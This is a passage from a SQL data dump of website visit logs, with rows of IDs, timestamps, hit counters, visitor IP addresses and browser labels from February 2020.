,0,'66.249.64.28','chrome'),(484960,1582756130,2,2,0,0,'66.249.64.26','chrome'),(484961,1582757082,1,1,0,0,'66.249.64.30','chrome'),(484962,1582757090,1,1,0,0,'157.55.39.95','other'),(484963,1582757623,1,1,0,0,'66.249.64.28','chrome'),(484964,1582757636,1,1,0,0,'207.46.13.12','other'),(484965,1582758963,1,1,0,0,'207.46.13.12','other'),(484966,1582759933,1,1,0,0,'157.55.39.95','other'),(484967,1582760232,1,1,0,0,'66.249.64.28','chrome'),(484968,1582760931,1,1,0,0,'207.46.13.12','other'),(484969,1582761055,1,1,0,0,'66.249.64.26','chrome'),(484970,1582761176,1,1,0,0,'66.249.64.27','chrome'),(484971,1582761416,1,1,0,0,'66.249.64.28','chrome'),(484972,1582762449,1,1,0,0,'8.29.198.26','other'),(484973,1582762573,1,1,0,0,'178.154.171.127','other'),(484974,1582763270,1,1,0,0,'66.249.64.28','chrome'),(484975,1582763337,1,1,0,0,'207.46.13.12','other'),(484976,1582763356,1,1,0,0,'66.249.70.36','chrome'),(484977,1582764134,2,2,0,0,'178.154.171.134','other'),(484978,1582764569,1,1,0,0,'157.55.39.95','other'),(484979,1582764914,1,1,0,0,'62.205.134.182','other'),(484980,1582765323,1,1,0,0,'157.55.39.249','other'),(484981,1582765497,1,0,1,0,'157.55.39.95',''),(484982,1582765599,1,1,0,0,'66.249.64.27','chrome'),(484983,1582765608,1,1,0,0,'157.55.39.95','other'),(484984,1582766178,1,1,0,0,'8.29.198.27','other'),(484985,1582766419,3,3,0,0,'178.154.171.134','other'),(484986,1582767260,1,1,0,0,'66.249.64.28','chrome'),(484987,1582767504,1,1,0,0,'66.249.64.26','chrome'),(484988,1582767781,1,1,0,0,'178.154.171.127','other'),(484989,1582768186,2,2,0,0,'157.55.39.249','other'),(484990,1582768977,1,1,0,0,'66.249.64.27','chrome'),(484991,1582769248,2,2,0,0,'51.68.152.26','chrome'),(484992,1582769466,1,1,0,0,'141.8.142.161','other'),(484993,1582769470,1,1,0,0,'157.55.39.249','other'),(484994,1582770165,2,2,0,0,'178.154.171.134','other'),(484995,1582770674,1,1,0,0,'66.249.70.36','chrome'),(484996,1582770804,2,2,0,0,'66.249.70.62','chrome'),(484997,1582771019,1,1,0,0,'66.249.64.27','chrome'),(484998,1582772918,1,1,0,0,'178.154.171.127','other'),(484999,1582772924,1,1,0,0,'66.249.64.26','chrome'),(485000,1582773210,4,4,0,0,'178.154.171.134','other'),(485001,1582773452,1,1,0,0,'8.29.198.26','other'),(485002,1582774137,1,1,0,0,'178.154.171.134','other'),(485003,1582774160,1,0,1,0,'66.249.64.28',''),(485004,1582774890,1,1,0,0,'66.249.64.27','chrome'),(485005,1582775009,1,1,0,0,'66.249.70.33','chrome'),(485006,1582775671,2,2,0,0,'178.154.171.134','other'),(485007,1582775809,1,0,1,0,'157.55.39.249',''),(485008,1582776503,1,1,0,0,'66.249.70.33','chrome'),(485009,1582776734,1,1,0,0,'178.154.171.127','other'),(485010,1582777195,1,1,0,0,'8.29.198.27','other'),(485011,1582777223,2,1,1,0,'66.249.64.28',''),(485012,1582777550,1,1,0,0,'66.249.64.26','chrome'),(485013,1582778571,1,1,0,0,'66.249.64.28','chrome'),(485014,1582778581,3,3,0,0,'178.154.171.134','other'),(485015,1582779227,1,1,0,0,'91.196.178.1','chrome'),(485016,1582781063,1,1,0,0,'185.15.56.22','other'),(485017,1582781259,3,3,0,0,'66.249.64.28','chrome'),(485018,1582781291,1,1,0,0,'66.249.64.26','chrome'),(485019,1582781543,1,1,0,0,'157.55.39.95','other'),(485020,1582782169,1,1,0,0,'62.205.134.182','other'),(485021,1582782269,1,1,0,0,'66.249.70.33','chrome'),(485022,1582782321,2,2,0,0,'66.249.64.27','chrome'),(485023,1582782465,2,2,0,0,'178.154.171.134','other'),(485024,1582783382,2,2,0,0,'178.154.171.134','other'),(485025,1582783795,2,2,0,0,'91.196.178.93','chrome'),(485026,1582783980,1,1,0,0,'66.249.64.28','chrome'),(485027,1582784034,1,1,0,0,'178.154.171.127','other'),(485028,1582784116,1,1,0,0,'91.196.178.162','chrome'),(485029,1582784307,1,1,0,0,'66.249.70.62','chrome'),(485030,1582784340,1,1,0,0,'66.249.64.27','chrome'),(485031,1582784405,1,1,0,0,'8.29.198.26','other'),(485032,1582785345,1,1,0,0,'66.249.64.27','chrome'),(485033,1582785422,1,1,0,0,'66.249.64.26','chrome'),(485034,1582785494,1,1,0,0,'128.124.45.149','other'),(485035,1582785585,2,2,0,0,'66.249.70.33','chrome'),(485036,1582786061,1,1,0,0,'178.154.171.134','other'),(485037,1582786148,1,1,0,0,'91.240.98.45','chrome'),(485038,1582787204,1,1,0,0,'178.154.171.134','other'),(485039,1582787327,1,1,0,0,'66.249.70.62','chrome'),(485040,1582788202,1,1,0,0,'8.29.198.26','other'),(485041,1582788339,1,1,0,0,'66.249.64.28','chrome'),(485042,1582788609,1,1,0,0,'178.133.1.34','chrome'),(485043,1582788793,1,1,0,0,'178.154.171.134','other'),(485044,1582789371,1,1,0,0,'134.122.4.172','chrome'),(485045,1582789850,2,2,0,0,'178.154.171.134','other'),(485046,1582790774,1,1,0,0,'66.249.70.36','chrome'),(485047,1582790846,3,3,0,0,'178.154.171.134','other'),(485048,1582791097,1,1,0,0,'91.196.178.76','chrome'),(485049,1582791653,1,1,0,0,'91.196.178.179','chrome'),(485050,1582791783,5,5,0,0,'207.46.13.12','other'),(485051,1582792099,1,1,0,0,'157.55.39.249','other'),(485052,1582792336,1,1,0,0,'178.154.171.134','other'),(485053,1582792362,2,2,0,0,'66.249.70.36','chrome'),(485054,1582792697,1,1,0,0,'66.249.64.28','chrome'),(485055,1582793509,2,2,0,0,'178.154.171.134','other'),(485056,1582794009,1,1,0,0,'141.8.142.2','other'),(485057,1582794295,1,1,0,0,'66.249.64.28','chrome'),(485058,1582794501,2,2,0,0,'178.154.171.127','other'),(485059,1582794708,4,4,0,0,'52.26.17.211','firefox'),(485060,1582794711,2,2,0,0,'52.26.17.211','chrome'),(485061,1582795390,1,1,0,0,'8.29.198.27','other'),(485062,1582795718,1,1,0,0,'66.249.64.27','chrome'),(485063,1582796081,2,2,0,0,'66.249.64.26','chrome'),(485064,1582796884,1,1,0,0,'157.55.39.249','other'),(485065,1582797093,2,2,0,0,'178.154.171.134','other'),(485066,1582797607,1,1,0,0,'66.249.64.27','chrome'),(485067,1582797683,1,1,0,0,'66.249.64.28','chrome'),(485068,1582797932,1,1,0,0,'66.249.70.33','chrome'),(485069,1582798169,1,1,0,0,'178.154.171.134','other'),(485070,1582799128,1,1,0,0,'34.237.51.192','chrome'),(485071,1582799258,1,1,0,0,'8.29.198.27','other'),(485072,1582799511,1,1,0,0,'66.249.64.28','chrome'),(485073,1582799545,1,1,0,0,'66.249.64.27','chrome'),(485074,1582800545,2,2,0,0,'178.154.171.127','other'),(485075,1582800779,1,1,0,0,'178.154.171.134','other'),(485076,1582802073,2,2,0,0,'178.154.171.134','other'),(485077,1582802888,1,1,0,0,'129.2.245.216','other'),(485078,1582802928,1,1,0,0,'66.249.64.26','chrome'),(485079,1582803126,1,1,0,0,'178.154.171.134','other'),(485080,1582803317,2,2,0,0,'66.249.64.27','chrome'),(485081,1582803974,1,1,0,0,'109.74.154.72','chrome'),(485082,1582804540,3,2,1,0,'66.249.64.27',''),(485083,1582804612,2,2,0,0,'31.13.127.10','other'),(485084,1582804613,1,1,0,0,'31.13.127.11','other'),(485085,1582805163,1,1,0,0,'178.154.171.134','other'),(485086,1582805426,1,1,0,0,'66.249.64.28','chrome'),(485087,1582805758,2,2,0,0,'178.154.171.127','other'),(485088,1582806167,1,0,1,0,'66.249.64.27',''),(485089,1582806229,2,2,0,0,'66.249.64.27','chrome'),(485090,1582806418,1,1,0,0,'8.29.198.25','other'),(485091,1582806711,2,2,0,0,'66.249.64.26','chrome'),(485092,1582806785,1,1,0,0,'178.154.171.134','other'),(485093,1582807134,1,1,0,0,'46.211.152.35','chrome'),(485094,1582807619,2,2,0,0,'157.55.39.95','other'),(485095,1582807772,2,2,0,0,'66.249.64.26','chrome'),(485096,1582808022,1,1,0,0,'91.196.178.76','chrome'),(485097,1582808282,1,1,0,0,'66.249.64.28','chrome'),(485098,1582808358,2,2,0,0,'66.249.64.27','chrome'),(485099,1582808376,3,3,0,0,'207.46.13.12','other'),(485100,1582808865,1,1,0,0,'157.55.39.95','other'),(485101,1582809492,1,1,0,0,'178.154.171.134','other'),(485102,1582809578,2,2,0,0,'66.249.64.28','chrome'),(485103,1582810257,1,1,0,0,'8.29.198.27','other'),(485104,1582810421,1,1,0,0,'141.8.188.12','other'),(485105,1582810543,1,1,0,0,'66.249.70.33','chrome'),(485106,1582810572,1,1,0,0,'66.249.64.27','chrome'),(485107,1582810616,1,1,0,0,'178.154.171.127','other'),(485108,1582810979,1,1,0,0,'66.249.64.26','chrome'),(485109,1582811343,1,1,0,0,'141.8.183.100','other'),(485110,1582811756,1,1,0,0,'193.17.44.18','chrome'),(485111,1582811790,1,1,0,0,'178.154.171.134','other'),(485112,1582811939,1,1,0,0,'207.46.13.12','other'),(485113,1582812440,1,1,0,0,'178.154.171.66','other'),(485114,1582812880,1,1,0,0,'91.196.178.158','firefox'),(485115,1582813184,1,1,0,0,'66.249.64.28','chrome'),(485116,1582813349,1,1,0,0,'178.154.171.134','other'),(485117,1582814386,1,1,0,0,'141.8.183.73','other'),(485118,1582815079,1,1,0,0,'37.9.113.163','other'),(485119,1582815175,1,1,0,0,'178.154.171.134','other'),(485120,1582815428,1,1,0,0,'66.249.64.28','chrome'),(485121,1582816133,1,0,1,0,'207.46.13.12',''),(485122,1582816809,1,1,0,0,'91.196.177.46','chrome'),(485123,1582816933,1,1,0,0,'66.249.70.62','chrome'),(485124,1582817191,1,1,0,0,'31.13.127.16','other'),(485125,1582817192,1,1,0,0,'31.13.127.7','other'),(485126,1582817193,1,1,0,0,'31.13.127.10','other'),(485127,1582817664,1,1,0,0,'8.29.198.25','other'),(485128,1582818038,2,2,0,0,'178.154.171.134','other'),(485129,1582818492,1,1,0,0,'207.46.13.12','other'),(485130,1582818988,1,1,0,0,'178.154.171.134','other'),(485131,1582819781,1,1,0,0,'157.55.39.249','other'),(485132,1582819916,1,1,0,0,'31.13.127.2','other'),(485133,1582820055,1,1,0,0,'46.200.223.37','chrome'),(485134,1582821361,3,3,0,0,'18.237.186.220','firefox'),(485135,1582821365,2,2,0,0,'18.237.186.220','chrome'),(485136,1582821373,1,1,0,0,'8.29.198.26','other'),(485137,1582821644,2,2,0,0,'178.154.171.127','other'),(485138,1582822013,1,1,0,0,'91.196.178.189','chrome'),(485139,1582822087,1,1,0,0,'91.196.178.74','firefox'),(485140,1582822371,1,0,1,0,'157.55.39.249',''),(485141,1582823170,1,1,0,0,'91.196.178.35','chrome'),(485142,1582825450,1,1,0,0,'91.209.11.236','other'),(485143,1582825480,1,1,0,0,'66.249.64.28','chrome'),(485144,1582826368,1,1,0,0,'176.36.88.53','chrome'),(485145,1582826686,1,1,0,0,'95.108.181.104','other'),(485146,1582826768,1,1,0,0,'178.154.171.134','other'),(485147,1582827157,1,1,0,0,'46.133.45.35','chrome'),(485148,1582827878,1,1,0,0,'178.154.171.134','other'),(485149,1582827884,1,1,0,0,'141.8.142.161','other'),(485150,1582828384,1,1,0,0,'141.8.183.73','other'),(485151,1582828457,1,1,0,0,'91.196.178.21','chrome'),(485152,1582828568,1,1,0,0,'66.249.64.26','chrome'),(485153,1582828757,1,1,0,0,'207.46.13.12','other'),(485154,1582828769,1,1,0,0,'8.29.198.25','other'),(485155,1582829021,1,1,0,0,'194.68.44.163','chrome'),(485156,1582830374,1,1,0,0,'178.154.171.134','other'),(485157,1582831489,1,1,0,0,'207.46.13.12','other'),(485158,1582831742,1,1,0,0,'31.43.31.35','chrome'),(485159,1582832170,2,2,0,0,'178.154.171.134','other'),(485160,1582832551,1,1,0,0,'207.46.13.12','other'),(485161,1582832557,1,1,0,0,'8.29.198.27','other'),(485162,1582833325,1,1,0,0,'178.154.171.134','other'),(485163,1582833799,2,2,0,0,'178.154.171.127','other'),(485164,1582834868,1,1,0,0,'178.154.171.134','other'),(485165,1582835371,1,0,1,0,'66.249.64.26',''),(485166,1582835653,1,1,0,0,'141.8.142.2','other'),(485167,1582836041,1,1,0,0,'157.55.39.249','other'),(485168,1582837151,1,1,0,0,'66.249.64.27','chrome'),(485169,1582837482,1,1,0,0,'66.249.70.33','chrome'),(485170,1582838761,1,1,0,0,'178.154.171.134','other'),(485171,1582839169,1,1,0,0,'66.249.70.62','chrome'),(485172,1582839314,1,1,0,0,'144.168.162.250','chrome'),(485173,1582839347,1,1,0,0,'66.249.64.27','chrome'),(485174,1582839840,1,1,0,0,'8.29.198.25','other'),(485175,1582839867,2,2,0,0,'207.46.13.12','other'),(485176,1582840367,3,3,0,0,'178.154.171.134','other'),(485177,1582840972,1,1,0,0,'188.147.37.148','chrome'),(485178,1582841061,1,1,0,0,'46.201.175.151','chrome'),(485179,1582841099,3,3,0,0,'66.249.64.28','chrome'),(485180,1582841213,3,3,0,0,'66.249.64.26','chrome'),(485181,1582841297,1,1,0,0,'178.154.171.134','other'),(485182,1582842086,1,1,0,0,'66.249.64.27','chrome'),(485183,1582842226,1,1,0,0,'66.249.70.36','chrome'),(485184,1582842412,1,1,0,0,'178.154.171.134','other'),(485185,1582842643,1,1,0,0,'66.249.64.26','chrome'),(485186,1582843633,1,1,0,0,'8.29.198.25','other'),(485187,1582843863,1,1,0,0,'66.249.64.27','chrome'),(485188,1582843874,1,1,0,0,'178.154.171.127','other'),(485189,1582844374,1,1,0,0,'66.249.64.28','chrome'),(485190,1582844820,2,2,0,0,'178.154.171.134','other'),(485191,1582845293,2,1,1,0,'66.249.64.28',''),(485192,1582845832,1,1,0,0,'66.249.64.28','chrome'),(485193,1582846116,1,1,0,0,'66.249.64.27','chrome'),(485194,1582847791,1,1,0,0,'66.249.70.33','chrome'),(485195,1582848021,1,1,0,0,'66.249.70.36','chrome'),(485196,1582848037,2,1,1,0,'66.249.64.26',''),(485197,1582848302,2,2,0,0,'66.249.64.28','chrome'),(485198,1582849675,1,1,0,0,'66.249.64.27','chrome'),(485199,1582849817,1,1,0,0,'66.249.64.26','chrome'),(485200,1582849978,1,1,0,0,'66.249.64.28','chrome'),(485201,1582850861,1,1,0,0,'8.29.198.27','other'),(485202,1582850867,1,1,0,0,'66.249.64.26','chrome'),(485203,1582851314,1,1,0,0,'62.205.134.182','other'),(485204,1582851426,1,1,0,0,'66.249.70.33','chrome'),(485205,1582851836,1,1,0,0,'80.95.45.238','chrome'),(485206,1582854671,1,1,0,0,'8.29.198.26','other'),(485207,1582855268,1,1,0,0,'66.249.64.27','chrome'),(485208,1582856408,1,1,0,0,'178.154.171.134','other'),(485209,1582856963,1,1,0,0,'178.154.171.127','other'),(485210,1582857524,2,2,0,0,'91.209.11.236','other'),(485211,1582857675,1,1,0,0,'66.249.70.62','chrome'),(485212,1582858014,1,1,0,0,'66.249.64.27','chrome'),(485213,1582858231,1,1,0,0,'66.249.64.26','chrome'),(485214,1582858600,1,1,0,0,'91.209.11.236','other'),(485215,1582858638,1,1,0,0,'66.249.70.36','chrome'),(485216,1582859496,1,1,0,0,'66.249.70.33','chrome'),(485217,1582861246,2,2,0,0,'66.249.64.26','chrome'),(485218,1582861362,1,1,0,0,'157.55.39.95','other'),(485219,1582861458,1,1,0,0,'66.249.64.27','chrome'),(485220,1582861860,1,1,0,0,'8.29.198.25','other'),(485221,1582862750,1,1,0,0,'66.249.70.36','chrome'),(485222,1582863938,1,1,0,0,'173.212.233.72','firefox'),(485223,1582864010,1,1,0,0,'91.196.178.146','firefox'),(485224,1582865686,1,1,0,0,'8.29.198.25','other'),(485225,1582865855,1,1,0,0,'66.249.64.27','chrome'),(485226,1582866725,1,1,0,0,'66.249.70.62','chrome'),(485227,1582866896,1,1,0,0,'66.249.64.26','chrome'),(485228,1582866981,1,1,0,0,'66.249.64.27','chrome'),(485229,1582867376,1,1,0,0,'141.8.142.161','other'),(485230,1582867723,1,1,0,0,'178.154.171.134','other'),(485231,1582868343,1,1,0,0,'66.249.64.28','chrome'),(485232,1582868580,1,1,0,0,'62.205.134.182','other'),(485233,1582868831,2,2,0,0,'178.154.171.134','other'),(485234,1582869809,1,1,0,0,'141.8.183.73','other'),(485235,1582869896,1,1,0,0,'66.249.64.26','chrome'),(485236,1582869951,4,4,0,0,'34.216.170.225','chrome'),(485237,1582869955,1,1,0,0,'34.216.170.225','firefox'),(485238,1582869976,4,4,0,0,'54.202.135.96','chrome'),(485239,1582869981,1,1,0,0,'54.202.135.96','firefox'),(485240,1582870910,1,1,0,0,'66.249.64.26','chrome'),(485241,1582871429,1,1,0,0,'141.8.183.111','other'),(485242,1582872447,1,1,0,0,'157.55.39.95','other'),(485243,1582872450,1,1,0,0,'37.53.228.106','chrome'),(485244,1582872454,1,1,0,0,'157.55.39.249','other'),(485245,1582872844,1,1,0,0,'8.29.198.25','other'),(485246,1582873190,2,2,0,0,'66.249.64.27','chrome'),(485247,1582873436,1,1,0,0,'66.249.64.28','chrome'),(485248,1582874468,1,1,0,0,'31.40.202.182','other'),(485249,1582874716,1,1,0,0,'66.249.70.62','chrome'),(485250,1582874773,1,1,0,0,'91.124.118.142','chrome'),(485251,1582874811,1,1,0,0,'178.154.171.134','other'),(485252,1582875026,1,1,0,0,'141.8.132.12','other'),(485253,1582875206,1,1,0,0,'141.8.142.161','other'),(485254,1582875695,1,1,0,0,'157.55.39.95','other'),(485255,1582875732,1,0,1,0,'66.249.64.27',''),(485256,1582876730,1,1,0,0,'8.29.198.26','other'),(485257,1582877110,1,1,0,0,'66.249.64.28','chrome'),(485258,1582877252,1,1,0,0,'95.108.181.104','other'),(485259,1582877308,1,1,0,0,'91.196.178.82','chrome'),(485260,1582877397,1,1,0,0,'66.249.64.27','chrome'),(485261,1582878650,1,1,0,0,'66.249.70.33','chrome'),(485262,1582879255,1,1,0,0,'91.214.31.235','chrome'),(485263,1582879803,1,1,0,0,'66.249.64.26','chrome'),(485264,1582880221,1,1,0,0,'141.8.132.2','other'),(485265,1582880411,1,1,0,0,'141.8.183.73','other'),(485266,1582880615,1,1,0,0,'66.249.64.28','chrome'),(485267,1582880786,1,1,0,0,'66.249.64.26','chrome'),(485268,1582881510,1,1,0,0,'178.154.171.134','other'),(485269,1582881528,1,1,0,0,'209.17.97.58','other'),(485270,1582882048,1,1,0,0,'91.196.179.33','chrome'),(485271,1582882310,1,1,0,0,'66.249.64.28','chrome'),(485272,1582882546,1,1,0,0,'66.249.64.27','chrome'),(485273,1582883004,1,1,0,0,'95.216.96.244','other'),(485274,1582883840,1,1,0,0,'8.29.198.27','other'),(485275,1582884051,1,1,0,0,'66.249.70.36','chrome'),(485276,1582884061,1,1,0,0,'66.249.64.27','chrome'),(485277,1582884148,3,3,0,0,'66.249.64.26','chrome'),(485278,1582884462,1,1,0,0,'34.204.202.47','chrome'),(485279,1582884611,1,0,1,0,'66.249.64.28',''),(485280,1582885103,1,1,0,0,'66.249.64.26','chrome'),(485281,1582885689,1,1,0,0,'66.249.64.28','chrome'),(485282,1582886063,1,1,0,0,'31.13.127.23','other'),(485283,1582886064,1,1,0,0,'31.13.127.11','other'),(485285,1582886852,1,1,0,0,'141.8.183.73','other'),(485286,1582887296,1,1,0,0,'178.154.171.127','other'),(485287,1582887735,1,1,0,0,'8.29.198.26','other'),(485288,1582888837,1,1,0,0,'173.212.233.72','firefox'),(485289,1582888922,1,1,0,0,'66.249.64.27','chrome'),(485290,1582888923,2,2,0,0,'66.249.64.28','chrome'),(485291,1582888998,1,1,0,0,'66.249.64.26','chrome'),(485292,1582889930,1,1,0,0,'109.74.154.72','chrome'),(485293,1582889969,1,1,0,0,'87.250.224.90','other'),(485294,1582890056,1,1,0,0,'178.154.171.134','other'),(485295,1582890390,2,2,0,0,'66.249.64.26','chrome'),(485296,1582890864,1,1,0,0,'66.249.64.27','chrome'),(485297,1582890920,1,1,0,0,'66.249.64.28','chrome'),(485298,1582891062,1,1,0,0,'66.249.70.33','chrome'),(485299,1582892344,1,1,0,0,'37.9.113.177','other'),(485300,1582892491,1,1,0,0,'66.249.64.27','chrome'),(485301,1582893457,1,1,0,0,'212.1.71.50','chrome'),(485302,1582893573,1,1,0,0,'5.45.207.65','other'),(485303,1582893689,1,1,0,0,'91.124.118.35','chrome'),(485304,1582894072,1,1,0,0,'141.8.142.177','other'),(485305,1582894172,1,1,0,0,'5.45.207.49','other'),(485306,1582894431,1,1,0,0,'141.8.142.115','other'),(485307,1582894837,1,1,0,0,'8.29.198.26','other'),(485308,1582895457,1,1,0,0,'66.249.70.33','chrome'),(485309,1582895700,1,1,0,0,'91.196.178.60','chrome'),(485310,1582895771,1,1,0,0,'79.105.174.105','chrome'),(485311,1582895773,1,1,0,0,'5.167.255.250','chrome'),(485312,1582895904,1,1,0,0,'207.46.13.79','other'),(485313,1582896926,1,1,0,0,'178.133.132.6','chrome'),(485314,1582897354,2,2,0,0,'178.133.0.46','chrome'),(485315,1582897641,1,1,0,0,'66.249.64.28','chrome'),(485316,1582897765,1,1,0,0,'178.154.171.66','other'),(485317,1582897923,1,1,0,0,'178.133.132.6','chrome'),(485318,1582898741,1,1,0,0,'8.29.198.25','other'),(485319,1582899383,1,1,0,0,'5.45.207.65','other'),(485320,1582899894,1,1,0,0,'66.249.64.28','chrome'),(485321,1582900440,1,1,0,0,'37.120.217.12','firefox'),(485322,1582901197,1,1,0,0,'141.8.188.12','other'),(485323,1582901259,1,1,0,0,'178.154.171.127','other'),(485324,1582901704,1,1,0,0,'66.249.70.33','chrome'),(485325,1582902857,1,1,0,0,'141.8.142.119','other'),(485326,1582902988,1,1,0,0,'80.95.45.238','chrome'),(485327,1582904283,1,1,0,0,'141.8.183.53','other'),(485328,1582904570,1,1,0,0,'95.108.213.3','other'),(485329,1582905408,1,1,0,0,'141.8.142.177','other'),(485330,1582905412,1,1,0,0,'141.8.183.100','other'),(485331,1582905883,1,1,0,0,'8.29.198.27','other'),(485332,1582907084,1,1,0,0,'141.8.188.12','other'),(485333,1582907125,1,1,0,0,'141.8.142.2','other'),(485334,1582907329,1,1,0,0,'141.8.183.73','other'),(485335,1582907364,1,1,0,0,'141.8.142.115','other'),(485336,1582907721,1,1,0,0,'176.105.212.107','firefox'),(485337,1582908220,1,1,0,0,'141.8.183.53','other'),(485338,1582909789,1,1,0,0,'8.29.198.25','other'),(485339,1582909992,1,1,0,0,'5.45.207.65','other'),(485340,1582910244,1,1,0,0,'37.9.113.6','other'),(485341,1582910247,1,1,0,0,'141.8.188.38','other'),(485342,1582910589,1,1,0,0,'141.8.183.73','other'),(485343,1582911490,1,1,0,0,'91.209.11.236','other'),(485344,1582911879,1,1,0,0,'46.211.135.24','chrome'),(485345,1582912054,1,1,0,0,'87.250.224.90','other'),(485346,1582912644,1,1,0,0,'178.154.171.66','other'),(485347,1582912999,2,2,0,0,'178.154.171.7','other'),(485348,1582913427,1,1,0,0,'141.8.188.12','other'),(485349,1582913461,1,1,0,0,'66.249.64.26','chrome'),(485350,1582913499,1,1,0,0,'176.105.212.107','chrome'),(485351,1582913612,1,1,0,0,'209.17.96.66','other'),(485352,1582914320,1,1,0,0,'141.8.183.73','other'),(485353,1582914487,1,1,0,0,'141.8.188.18','other'),(485354,1582916525,1,1,0,0,'66.249.70.33','chrome'),(485355,1582916847,1,1,0,0,'141.8.132.12','other'),(485356,1582916884,1,1,0,0,'8.29.198.25','other'),(485357,1582917041,1,1,0,0,'141.8.183.100','other'),(485358,1582917222,1,0,1,0,'66.249.64.27',''),(485359,1582917494,1,1,0,0,'207.46.13.42','other'),(485360,1582917545,1,1,0,0,'207.46.13.79','other'),(485361,1582917828,1,1,0,0,'37.9.113.39','other'),(485362,1582918386,1,1,0,0,'178.154.171.134','other'),(485363,1582918416,1,1,0,0,'141.8.142.115','other'),(485364,1582918931,32,32,0,0,'176.31.104.153','other'),(485365,1582918937,1,1,0,0,'37.9.113.33','other'),(485366,1582919672,1,1,0,0,'207.46.13.79','other'),(485367,1582920793,1,1,0,0,'141.8.142.119','other'),(485368,1582920884,1,1,0,0,'8.29.198.25','other'),(485369,1582922405,1,1,0,0,'66.249.64.26','chrome'),(485370,1582922720,2,2,0,0,'141.8.142.2','other'),(485371,1582922752,1,1,0,0,'5.255.253.8','other'),(485372,1582923240,1,1,0,0,'37.213.148.49','chrome'),(485373,1582924075,1,1,0,0,'116.193.170.50','chrome'),(485374,1582924440,1,1,0,0,'37.9.113.97','other'),(485375,1582925534,1,1,0,0,'206.189.213.92','other'),(485376,1582927103,1,1,0,0,'141.8.142.2','other'),(485377,1582927547,1,1,0,0,'95.108.213.39','other'),(485378,1582927789,1,1,0,0,'37.9.113.97','other'),(485379,1582927792,1,1,0,0,'141.8.183.111','other'),(485380,1582927882,1,1,0,0,'8.29.198.27','other'),(485381,1582929510,80,80,0,0,'31.40.202.182','other'),(485382,1582930996,1,1,0,0,'66.249.70.62','chrome'),(485383,1582931427,1,0,1,0,'207.46.13.167',''),(485384,1582931544,1,1,0,0,'66.249.64.28','chrome'),(485385,1582931997,2,2,0,0,'178.154.171.134','other'),(485386,1582932095,1,1,0,0,'8.29.198.25','other'),(485387,1582933565,1,1,0,0,'31.40.202.182','other'),(485388,1582933922,1,1,0,0,'141.8.142.119','other'),(485389,1582934901,1,1,0,0,'157.55.39.239','other'),(485390,1582935233,1,0,1,0,'66.249.64.28',''),(485391,1582935381,1,1,0,0,'66.249.64.26','chrome'),(485392,1582935783,2,2,0,0,'141.8.183.73','other'),(485393,1582935941,1,1,0,0,'141.8.132.2','other'),(485394,1582937639,2,2,0,0,'178.154.171.134','other'),(485395,1582937714,1,1,0,0,'62.205.134.182','other'),(485396,1582937925,1,1,0,0,'109.70.106.130','other'),(485397,1582938207,1,0,1,0,'207.46.13.79',''),(485398,1582938878,1,1,0,0,'8.29.198.26','other'),(485399,1582938940,1,1,0,0,'178.154.171.134','other'),(485400,1582939418,1,1,0,0,'207.46.13.42','other'),(485401,1582939591,1,1,0,0,'141.8.142.161','other'),(485402,1582940713,1,1,0,0,'207.46.13.42','other'),(485403,1582943240,1,1,0,0,'8.29.198.27','other'),(485404,1582944140,1,1,0,0,'8.29.198.29','other'),(485405,1582944973,1,1,0,0,'176.36.88.53','chrome'),(485406,1582947092,1,1,0,0,'8.29.198.29','other'),(485407,1582947418,1,1,0,0,'207.46.13.79','other'),(485408,1582947683,1,1,0,0,'66.249.64.27','chrome'),(485409,1582948497,1,1,0,0,'207.46.13.42','other'),(485410,1582949848,1,1,0,0,'8.29.198.25','other'),(485411,1582950010,1,1,0,0,'207.46.13.42','other'),(485412,1582950409,1,1,0,0,'157.55.39.239','other'),(485413,1582951549,1,1,0,0,'157.55.39.239','other'),(485414,1582951710,1,1,0,0,'207.46.13.79','other'),(485415,1582952550,1,1,0,0,'91.209.11.236','other'),(485416,1582952956,1,1,0,0,'207.46.13.42','other'),(485417,1582954077,1,0,1,0,'157.55.39.239',''),(485418,1582954314,1,1,0,0,'8.29.198.26','other'),(485419,1582954960,1,1,0,0,'62.205.134.182','other'),(485420,1582955084,1,1,0,0,'185.11.29.240','chrome'),(485421,1582955432,1,1,0,0,'91.196.178.155','firefox'),(485422,1582955621,1,0,1,0,'66.249.64.27',''),(485423,1582956561,1,1,0,0,'207.46.13.79','other'),(485424,1582958694,1,1,0,0,'176.105.206.110','chrome'),(485425,1582960806,1,1,0,0,'8.29.198.25','other'),(485426,1582960843,1,1,0,0,'207.46.13.42','other'),(485427,1582961326,1,1,0,0,'157.55.39.239','other'),(485428,1582963146,1,1,0,0,'66.249.64.26','chrome'),(485429,1582964372,1,1,0,0,'207.46.13.42','other'),(485430,1582964397,2,2,0,0,'207.46.13.79','other'),(485431,1582964460,1,1,0,0,'207.46.13.167','other'),(485432,1582964474,1,1,0,0,'157.55.39.239','other'),(485433,1582964705,1,1,0,0,'91.199.139.171','chrome'),(485434,1582964860,1,1,0,0,'91.209.11.236','other'),(485435,1582964911,1,1,0,0,'178.154.171.134','other'),(485436,1582965008,1,1,0,0,'31.40.202.182','other'),(485437,1582965327,1,1,0,0,'8.29.198.25','other'),(485438,1582966075,1,1,0,0,'66.249.64.26','chrome'),(485439,1582966133,1,1,0,0,'141.8.142.2','other'),(485440,1582966567,1,1,0,0,'91.209.11.236','other'),(485441,1582966825,1,1,0,0,'178.154.171.134','other'),(485442,1582967049,1,0,1,0,'207.46.13.42',''),(485443,1582967401,1,1,0,0,'209.90.225.218','chrome'),(485444,1582968192,1,1,0,0,'38.99.62.94','other'),(485445,1582968226,1,1,0,0,'185.230.242.3','other'),(485446,1582968445,1,1,0,0,'141.8.183.53','other'),(485447,1582969830,3,3,0,0,'178.154.171.134','other'),(485448,1582971747,1,1,0,0,'8.29.198.25','other'),(485449,1582971790,1,1,0,0,'178.154.171.134','other'),(485450,1582973135,16,16,0,0,'31.40.202.182','other'),(485451,1582973236,1,0,1,0,'207.46.13.167',''),(485452,1582974040,35,35,0,0,'31.40.202.182','other'),(485453,1582974267,1,1,0,0,'178.154.171.134','other'),(485454,1582975492,1,1,0,0,'141.8.183.73','other'),(485455,1582975836,1,1,0,0,'178.154.171.134','other'),(485456,1582975851,1,1,0,0,'178.154.171.127','other'),(485457,1582975859,85,85,0,0,'31.40.202.182','other'),(485458,1582976183,1,0,1,0,'207.46.13.167',''),(485459,1582976192,1,1,0,0,'91.196.178.74','chrome'),(485460,1582976351,1,1,0,0,'8.29.198.26','other'),(485461,1582976810,1,1,0,0,'157.55.39.239','other'),(485462,1582977263,1,1,0,0,'94.153.107.22','chrome'),(485463,1582977278,1,1,0,0,'91.196.178.111','chrome'),(485464,